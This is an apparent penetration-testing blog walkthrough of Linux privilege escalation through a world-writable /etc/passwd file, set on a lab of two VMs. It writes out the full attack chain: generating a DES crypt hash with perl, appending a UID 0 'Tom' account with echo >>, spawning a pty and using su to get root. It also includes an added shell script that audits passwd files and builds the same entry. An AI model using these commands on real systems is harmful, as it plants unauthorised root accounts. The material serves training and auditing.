Linux Privilege Escalation via writeable /etc/passwd file


During a Red Team assessment, a Red Teamer faces many scenarios, and one of them is landing a normal, low-privilege shell. In a Windows environment the Administrator account, or a member of the Administrators group, holds the high privileges, so that is usually the target. Similarly, in a Linux environment the root user, or a user with sudo privileges, is the most targeted one.

In this blog, we will discuss a file permission misconfiguration that leads to privilege escalation. Generally, when solving a CTF, we always look at the passwd file to get an idea of the users available on the system.

The passwd file lives in the /etc directory of the Linux root filesystem. The most important thing to note is that this file is readable by every user, privileged or not; it is only supposed to be writable by root.

/etc/passwd

/etc/passwd keeps track of every registered user that has access to the system. It is a colon-separated file in which each line holds the following seven fields, in this order:
  • User name
  • Password field (normally "x", meaning the hash is kept in /etc/shadow; a hash placed directly in this field is still honoured at login)
  • User ID (UID)
  • Group ID (GID)
  • Full name or description of the user (the GECOS field)
  • User home directory
  • Login shell

Now, we will look at the /etc/passwd file:


Let's have a detailed look at the /etc/passwd entry for the root user, root:x:0:0:root:/root:/bin/bash, as an example:
  • root: username.
  • x: the password field. The "x" means the password hash is not stored here but in /etc/shadow, which only root can read.
  • 0: UID of the root user. The kernel identifies root by UID 0, not by the name, so any entry with UID 0 is effectively root.
  • 0: GID of the root user.
  • root: the GECOS field, used for the user's description or full name.
  • /root: home directory. A terminal session for this user starts in this directory.
  • /bin/bash: the user's login shell, spawned when the user logs on.

Environment Setup:
Two Linux boxes with the following configuration, set up as VMs in NAT network mode (sharing the host's IP address).

OS Name            Role                OS Version           Machine IP        Kernel Version
Kali Linux (x64)   Attacker Machine    Kali                 192.168.245.134   4.12.0-kali2-686
Ubuntu (x64)       Vulnerable Machine  Ubuntu 14.04.6 LTS   192.168.245.146   4.4.0-142-generic
Figure: OS Configuration

We assume that we already have an initial foothold on the target as the hacknpentest user, with the shell in hand on our attacker machine (the Kali box). Now we will upload the linuxprivchecker.py Python script to look for misconfigurations on the target system.

We use the wget (web get) utility on the target to download the script from the attacker machine.
Figure: Downloading the enumeration script to the target server.
Python is commonly available on Linux systems, and it is present on this target, so we run the enumeration script with the following command:
python linuxprivchecker.py
Figure: Running the script

Looking carefully at the script output, we find that the passwd file is world writable: its permissions give every user, not just root, both read and write access (the expected mode is 644, owned by root).
Figure: Misconfigured permissions on the passwd file

Such a permission misconfiguration can be abused to escalate the current user's privileges to root: because the system identifies root by UID 0, anyone who can append a line to /etc/passwd can create a new account with UID 0 and a password of their own choosing. We will now write into the passwd file to make our way to root.

We will add a user to the passwd file, explicitly placing the password hash in the password field instead of the usual "x". The hash is generated with perl's crypt() function, shown below, and the line is then appended to the file with the >> redirection. The new entry has its UID and GID set to 0, i.e. root.

Let's discuss the fields we are going to add to the passwd file.

Tom: name of the user.
ad7t5uIalqMws: DES crypt hash of the user's password (13 characters, the first two being the salt).
0: UID of root.
0: GID of root.
User_like_root: user description (GECOS field).
/root: home directory for the user.
/bin/bash: user's shell.

The >> operator redirects output to a file, appending it to the end (here, of /etc/passwd) rather than overwriting the file. Never use a single >, which would truncate /etc/passwd and lock every account, including root, out of the system.
Now, let’s make our way to root!
perl -le 'print crypt("Password@973","addedsalt")'
Figure: Generating encrypted password

The above command generates a traditional DES crypt hash from the following password and salt. Note that DES crypt only uses the first 8 characters of the password (Password) and the first 2 characters of the salt (ad), which is why the hash begins with ad:
Original Password: Password@973
Salt: addedsalt
Encrypted Password: ad7t5uIalqMws

With the above hash, we now append the following line to /etc/passwd, for example:

echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
Figure: Appending to passwd file

The Tom user has been appended to /etc/passwd, which we confirm with:
cat /etc/passwd
Figure: User added to passwd file
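The following POSIX shell functions are an added example, not code from the original post: they reproduce the enumeration check (is the passwd file writable?), assemble the entry the post appends, and then run the audit a defender would perform afterwards (any UID 0 account other than root, any password field that is not "x"). Every function takes the file path as an argument, so nothing touches the real /etc/passwd unless you pass it explicitly; the sample file contents and the function names are my own.

```shell
#!/bin/sh
# Added example, not the original post's code: audit a passwd-format file and
# build the entry the post appends. All functions take the file path as $1.

NL='
'

# True if FILE is writable by the current user (what the attacker really cares
# about; also covers group-writable files). Always true for root.
passwd_writable_by_me() {
    [ -w "$1" ]
}

# True if FILE has the "others may write" mode bit set, i.e. it is misconfigured
# regardless of who asks. -perm -002 is POSIX and tests the bit, not access.
passwd_world_writable() {
    [ -n "$(find "$1" -prune -perm -002 -print 2>/dev/null)" ]
}

# Print every username whose UID field is 0. The kernel identifies root by UID,
# so any name other than root here is a second root account.
passwd_uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }' "$1"
}

# Print name:hash for entries whose password field is neither "x" (hash lives in
# /etc/shadow) nor a locked marker ("*", "!", "!!"). An empty field is reported
# too: it means no password is required at all.
passwd_inline_hashes() {
    awk -F: '$2 != "x" && $2 !~ /^[*!]/ { print $1 ":" $2 }' "$1"
}

# Traditional DES crypt via perl, as in the post. Only the first 8 characters of
# the password and the first 2 of the salt are used; the 13-character result
# starts with those 2 salt characters. Some distributions build libxcrypt
# without DES, in which case this prints nothing useful (see the note below).
gen_des_hash() {
    perl -le 'print crypt($ARGV[0], $ARGV[1])' -- "$1" "$2"
}

# Assemble a passwd line from its seven fields, refusing a field that contains
# ":" or a newline (either would corrupt the file or split the entry in two).
make_passwd_entry() {
    [ $# -eq 7 ] || { echo "make_passwd_entry: expected 7 fields, got $#" >&2; return 1; }
    for f in "$@"; do
        case $f in
            *:*|*"$NL"*) echo "make_passwd_entry: illegal ':' or newline in field" >&2; return 1 ;;
        esac
    done
    printf '%s:%s:%s:%s:%s:%s:%s\n' "$@"
}

# Walk through the post's scenario on a constructed copy of a passwd file
# (sample contents made up for this example).
demo() {
    tmp=$(mktemp) || return 1
    cat > "$tmp" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
hacknpentest:x:1000:1000:hacknpentest,,,:/home/hacknpentest:/bin/bash
EOF
    chmod 666 "$tmp"                         # the misconfiguration from the post
    passwd_world_writable "$tmp" && echo "[!] $tmp is world-writable ($(ls -l "$tmp" | cut -c1-10))"
    # Same fields the post uses; the hash is the one it generated with perl.
    make_passwd_entry Tom ad7t5uIalqMws 0 0 User_like_root /root /bin/bash >> "$tmp"
    echo "UID 0 accounts:";  passwd_uid0_accounts "$tmp"   # root and Tom
    echo "inline hashes:";   passwd_inline_hashes "$tmp"   # Tom:ad7t5uIalqMws
    rm -f "$tmp"
}

if [ "${1:-}" = demo ]; then demo; fi
```

Run it as `sh audit.sh demo` to see the walkthrough. Two caveats worth keeping in mind: `[ -w FILE ]` answers "can I write this" (which is what the attacker needs, and it also catches group-writable files), while `-perm -002` answers "is the mode itself wrong", which is the question an auditor asks. If the target's libxcrypt was built without DES, crypt() will not produce a 13-character hash; a SHA-512 crypt hash generated with `openssl passwd -6 -salt addedsalt 'Password@973'` ($6$...) is accepted in the same field and works on every current distribution. On the defensive side, a second UID 0 account or a non-"x" password field in /etc/passwd is a high-signal finding, and `pwck -r /etc/passwd` (shadow-utils) flags both without any custom code.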

Now we try to log in as Tom with the su command, but it fails with:
su: must be run from a terminal

Oops!! We don't have a proper terminal yet: the initial shell has no pty attached, and su refuses to prompt for a password without one. We upgrade to an interactive bash shell using Python's pty module (Python is installed on the target), for example:
python -c 'import pty; pty.spawn("/bin/bash")'
Figure: Migrating to a stable shell

Now we log in as Tom with su Tom, entering Password@973 when prompted. And BOOM!! Because the entry carries UID 0, the resulting shell has root privileges.
Figure: Escalated our privileges to root!

We found a permission misconfiguration on the passwd file and leveraged it to log in as root. In the next blog post, we will discuss various other methods of Linux privilege escalation.

Till then hacknpentest!!!